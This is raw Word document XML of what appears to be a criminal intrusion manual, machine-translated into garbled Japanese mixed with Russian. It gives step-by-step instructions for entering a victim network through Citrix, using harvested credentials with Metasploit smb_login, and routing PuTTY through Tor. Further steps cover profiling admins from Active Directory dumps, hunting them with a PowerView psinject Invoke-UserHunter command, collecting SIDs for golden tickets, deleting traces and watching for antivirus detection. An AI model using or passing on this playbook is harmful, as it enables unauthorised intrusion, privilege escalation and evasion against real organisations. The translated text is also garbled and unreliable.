    <w:p w14:paraId="588A727F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">Dalee v brauzere vhodim v web-interface citrixa, vvodim login-pass potom zapuskaem deesktop (otkroetsya libo v browsere ili v citrixAPP) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52575BC9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7C690C33" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>デスクトップエントランス事業 - CSの</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>podtyagivaem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>エージェント</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65060D17" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="34312245" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>！------------------------------------------------------問----------------------------------------------------------！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC6EA8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7E2E08B5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4710F440" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>14)特定の役割を見つけた場合は、それをsmb_loginに実行することもできます-これはメタスプロイトのツールであり、メタスプロイトを発行して使用方法を説明します。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>、これらの信条でアクセスできるサーバーまたはヴォークが表示されます</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707715B0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="2387E3FF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ネットワークから収集したBPをソート</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">する方法 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F426635" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>1)FileZillaをダウンロードする</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2157DE6A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>2)パテをダウンロードし、パテをトーラスに通します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC5635" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Идем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>сюда</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> https://www.torproject.org/download/tor/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658416F4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Quality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATTENTION エキスパートバンドル</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17717778" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解凍</w:t>
      </w:r>
      <w:r>
        <w:t>し、Torディレクトリに移動してtor.exeを実行します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700EE7D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数秒で</w:t>
      </w:r>
      <w:r>
        <w:t>、書き込みに到達します 100%完了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CA1E94" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>パテ設定で、プロキシに移動し、sox5、IP 127.0.0.1ポート9050をインストールします</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0406A1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>3)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filezilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>を介してサーバーに移動し&gt; "Script"ディレクトリに移動します-スクリプトの隣にADファイルを置きます</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F39DC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">4)Puttyに移動し、サーバーに移動し、スクリプトが配置されているディレクトリに移動し、コマンドを指定します </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB91EE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>./script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A053F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>5)完了したら、FilleZillaに戻り、ソートされたものをピックアップします。その後、ADファイルとソートされたフォルダを必ず削除し、ソートされたフォルダが削除されない場合は、任意の名前に変更してください</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427F4B0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="6BE2E39F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7A432E57" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>USERHUNTERによるマニュアル その助けを借りて、私たちはこれらの車を見つけます。 また、ゴールデンチケットを得るために、そこからSIDを取得する</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ad_users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>必要ですが、それについては後で詳しく説明します</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55A8E0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">.ターゲットのリスト作成 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CA185" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">1.1 ad_usersを開き、私たちにとって潜在的に興味深い人を検索してください:管理者/エンジニア/情報技術者/IT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D46CE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sAMAccountName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> からアカウント ログインを取得する</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14621E5C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>1.2 ドメイン管理者のリストを取得する</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13337AE1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>1.3 1番目と2番目をリスト.txtファイルに入れる</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FDB9D8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="78CF5E78" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aploadim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Power View。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46681AFA" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-import _/home/user/soft/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/view.ps1_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DFCC8D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>2.1 --Comment: /home/user/soft/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powerview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/view.ps1 から Power View をインポートします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB70DFE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="4FA0C222" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>2.3 ハッキング</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65446BBD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">2.3.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE62641" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psinject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1884 x64 Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserHunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Threads 20 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> C:\ProgramData\list.txt &gt;&gt; C:\ProgramData\out.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74563100" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="29A2BF58" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> 1884年の代わりに、注入を行う権利があるPIDプロセス。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63934DA3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x64 </w:t>
      </w:r>
      <w:r>
        <w:t>- またはプロセスの x86 ビット幅。 タスクリストを参照</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251648AC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> s\programdata\list.thtには、ポイントNo.1で作成したリストがあるはずです。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62046A61" w14:textId="0335D2C6" w:rsidR="001E6EF3" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> 5-10-20 分後、out.tht の rezalt を確認します。 食べ終わるとすぐに補充します。 つまり、ファイルが0bytesの場合、動作するか、ABが書き込まれます(ABが焼かれた場合は、神戸に表示されます)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001E6EF3" w:rsidSect="00974BC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D5"/>
    <w:rsid w:val="001E6EF3"/>
    <w:rsid w:val="00492248"/>
    <w:rsid w:val="00522AD5"/>
    <w:rsid w:val="007F68EF"/>
    <w:rsid w:val="00974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2319CA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5912C819-0136-4BC7-8BE6-8B050436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74B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3265</Words>
  <Characters>18614</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>155</Lines>
  <Paragraphs>43</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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Sonjin Nanjo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sonjin Nanjo</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-07T04:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-07T05:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>